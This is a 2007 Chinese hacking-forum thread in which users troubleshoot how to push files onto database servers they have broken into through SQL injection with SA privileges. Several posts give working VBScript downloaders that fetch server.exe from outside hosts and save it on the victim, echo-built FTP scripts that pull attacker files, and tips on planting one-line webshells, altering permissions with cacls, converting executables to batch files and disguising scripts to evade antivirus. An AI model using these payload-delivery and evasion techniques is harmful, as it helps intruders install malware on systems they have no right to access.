邪恶八进制信息安全团队技术讨论组 » 技术讨论{ Technique Discussions } » [讨论]sa权限 依然无法上传文件 [查看完整版本]

wangle 2007-1-20 20:24

[讨论]sa权限 依然无法上传文件

议题作者：wangle
信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

得到一个注入点，内网。
以前看到大家在讨论sa权限无法上传文件的问题，我的这个站SA权限，能执行系统命令，但是还是传不上去。
写了一个down.vbs
[code]Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","[url]http://www.nbrcw.com/server.exe[/url]",0  
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()  
sGet.Write(xPost.responseBody)
sGet.SaveToFile "server.exe",2[/code]
提示
[quote]c:\down.vbs(3, 1) msxml3.dll: 系统未找到指定的资源。[/quote]

[code]iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3[/code]
执行后提示
[quote]c:\down1.vbs(1, 1) Microsoft VBScript 运行时错误: 下标越界[/quote]

[code]sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2 [/code]
FTP不行更加不行，我怀疑我人品真的有问题。

28度的冰 2007-1-21 07:22

如果是web服务器，找到他的IIS目录，然后echo一个一句话木马，再用马传文件。
如果是数据库服务器，除了lz试过的方法，还可以在自己的机子上架一个Tftp服务，用tftp传文件。
//
啊D有一个mssql，sa权限上传文件的工具，不过原理好像和down.vbs差不多。
下载地址[url]http://www.d99net.net/article.asp?id=104[/url]

wangle 2007-1-21 19:51

我想知道 提示错误的原因
是数据库服务器 都试了tftp也不行

remax 2007-1-21 21:55

telnet自己机器一下，能通的话就用tftp看看，不过基本上不成功。

silenter 2007-1-22 14:17

用20CN 开自己的FTP 在用echo命令写个文件到服务器 这样试试能不能传上去
比如: echo open your ip >ftp.txt
      echo  your name >>ftp.txt
      echo  your pass >>ftp.txt
     echo get your files >>ftp.txt
     echo bye >>ftp.txt
然后运行 ftp -s:ftp.txt   前提是对方服务器的ftp.exe没有改名

凋凌玫瑰 2007-1-23 01:37

转换成二进制,再用文本的方式传上去,虽然传输过程比较慢,但比较有效,传上去再恢复就ok了.

c4 2007-1-28 20:29

我也遇到一台鸡肉~~~ 有SA权限~~ 装了瑞星防火墙~~和瑞星杀软~~
不开21~不开3389~ 连WEBSHELL都没办法上~
无论哪个WEB目录都没有写权~~用ECHO上了down.vbs也下不得文件~~原因不明[s:39]
SA权限很大~ 可以增加用户~
感觉超变态~~~哪位大哥给指点小第一二

守护天使 2007-1-28 21:47

[s:38] 7楼的，SA权限如论哪个目录都没写权限？cacls改之。。瑞星直接好像停不了，VBS下不了，那有可能是让瑞星干掉了，直接改权限写一句话，不是非得上大马才算WEBSHELL。。有个一句话C/S端就行了，然后你再干什么还不行？

hushui 2007-1-29 00:04

原来自己也遇到过这个情况，最后发现是装了,mcafee。

c4 2007-1-29 13:33

[quote][b]引用第9楼[i]守护天使[/i]于[i]2007-01-28 21:47[/i]发表的[/b]:
[s:38] 7楼的，SA权限如论哪个目录都没写权限？cacls改之。。瑞星直接好像停不了，VBS下不了，那有可能是让瑞星干掉了，直接改权限写一句话，不是非得上大马才算WEBSHELL。。有个一句话C/S端就行了，然后你再干什么还不行？[/quote]


首先~~感谢你的意见~~ 但是我试过了~~运行cacls可以~~但就是改不得~~原因还是不明~呵呵~
一句话C/S端我有~可以利用lake2写的WEBSHELL~新建删除修改文件~都没问题~但就是不能在WEB目录下实行~也不能下载文件~到任何目录~VBS是免杀的~我在自己电脑试过可以下载~~上传到鸡肉就用不得了~也没被删除~~

我想多数是防火墙在作怪~~

朋友~~还有什么高招吗？？ 呵呵~~ [s:39]  [s:39]

dhb133 2007-1-29 13:38

楼主不防试试服务器有没有设置DNS
我曾遇到一个就是服务器没有设置DNS

风云逸剑 2007-5-10 08:51

[quote]引用第6楼凋凌玫瑰于2007-01-23 01:37发表的 :
转换成二进制,再用文本的方式传上去,虽然传输过程比较慢,但比较有效,传上去再恢复就ok了.[/quote]


大哥，这个具体怎么用呀？怎么转成二进制？再在CMD中远程恢复？

hushui 2007-5-10 08:57

msxml3.dll: 系统未找到指定的资源 重新注册下

virus-y2k 2007-5-10 10:23

ANY2BAT
转过去.
然后在上传..OK后直接在CMD里XX.BAT.
他会自动释放出XX.EXE文件.

scw121 2007-5-10 17:23

VBS下载不了马可能是因为服务器的IE设置了不可访问非法站点``

风云逸剑 2007-5-10 22:39

1：删除了msxml3.dll也是不传用echo上传的
2：有防火墙
3：FTFP不能用于2003

hackest 2007-5-11 02:19

可否单独PM我试下，乐于尝试[s:263]
感觉有可能拿下的哦[s:266]

freejanker 2007-5-16 13:43

此发言被投诉

cncxz 2007-5-16 16:39

关于第一个VBS脚本无法执行的问题,楼主可以试试下面这个:
[code]Set Post = CreateObject("Msxml2.XMLHTTP")
Post.Open "GET","http://www.eviloctal.com/server.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\setup.exe",2[/code]

貌似与[code]Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","[url]http://www.nbrcw.com/server.exe[/url]",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "server.exe",2[/code]

用的是不同组件.....或者试试有没办法能把135转出来(我菜..好像还没听说过这样的方法,不知有没牛人能提供),然后Recton传....

cncxz 2007-5-16 16:41

另关于VBS被杀的问题,FST出了一个VBS变形的工具,变形后我暂时没发现有什么服务器会杀,变形后文件可直接cscript执行.

wangle 2007-6-9 07:58

[quote]引用第12楼hushui于2007-05-10 08:57发表的 :
msxml3.dll: 系统未找到指定的资源 重新注册下[/quote]
小弟不才 不知道怎么注册?能否说明确点
想用
echo wscript.echo "PID ProcessName">>1.vbe
echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe
echo wscript.echo ps.handle^&vbtab^&ps.name>>1.vbe
echo next>>1.vbe
方法重启2000
但是
C:\>echo for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ >>1.vbe
不正常地定义参数对象。提供了不一致或不完整的信息。
怎么回事

不走寻常路 2007-9-16 18:29

SA权限.. cacls 修改权限 还是无法上传和写入....
  什么盘都不行......
                     请各位大虾..赐教..

hackest 2007-9-16 19:50

[quote]引用第21楼不走寻常路于2007-09-16 18:29发表的 :
SA权限..

不走寻常路 2007-9-19 22:59

[quote]引用第22楼hackest于2007-09-16 19:50发表的 :

是否确定SA没被降权？！
是否确定cacls.exe修改文件访问属性成功？！[/quote]
      
      可以执行 命令..     修改也成功;了   就是无法写入..
   

wclking 2007-9-24 13:52

你在VBS脚本最上面加一句容错代码就可以搞定了

冰的原点 2007-9-24 18:38

楼主的情况 ，我也想说两句！

有一次我也拿下了一台1433的机子，可是发现一个很怪的问题！！

我想下他的东西！于是想到最快的方法就是用Q传，可是没想到，老是网络超时！

发现DNS是通的，也不、无法上网！但是网络和网卡也是好的，可以看到传输的速度和IP地址！

真是不知道怎么回事？？

wuly 2007-9-30 04:29

[s:289] 老话了...有时间加我Q..我帮你看下..最近都在复习,,[s:264]

bm11 2007-10-2 02:48

[quote]引用第5楼凋凌玫瑰于2007-01-23 01:37发表的 :
转换成二进制,再用文本的方式传上去,虽然传输过程比较慢,但比较有效,传上去再恢复就ok了.[/quote]
超级实用..你喜欢.exe to .bat 或者.exe to .vbs都行//

查看完整版本: [讨论]sa权限 依然无法上传文件

© 1999-2008 EvilOctal Security Team